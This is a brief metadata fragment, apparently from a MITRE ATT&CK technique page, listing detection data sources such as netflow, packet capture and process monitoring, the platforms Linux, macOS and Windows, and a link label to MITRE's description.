Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre